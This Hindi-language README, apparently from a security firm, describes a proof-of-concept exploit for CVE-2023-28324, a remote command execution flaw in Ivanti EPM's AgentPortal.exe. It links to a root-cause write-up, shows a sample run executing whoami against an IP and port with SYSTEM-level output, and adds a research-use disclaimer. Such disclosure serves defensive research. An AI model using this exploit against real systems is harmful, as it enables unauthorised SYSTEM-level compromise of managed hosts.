
Ivanti EPM AgentPortal RCE भेद्यता
CVE-2023-28324 के लिए POC जो Ivanti EPM को प्रभावित करता है।
भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
यह POC AgentPortal.exe में एक भेद्यता का दुरुपयोग करके मनमाने कमांड निष्पादित करता है। इस POC के काम करने के लिए, आपको Ivanti EPM स्थापना से AgentPortal.exe और APCommon.dll के अपने स्वयं के संदर्भ प्रदान करने होंगे।
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
यह सॉफ्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।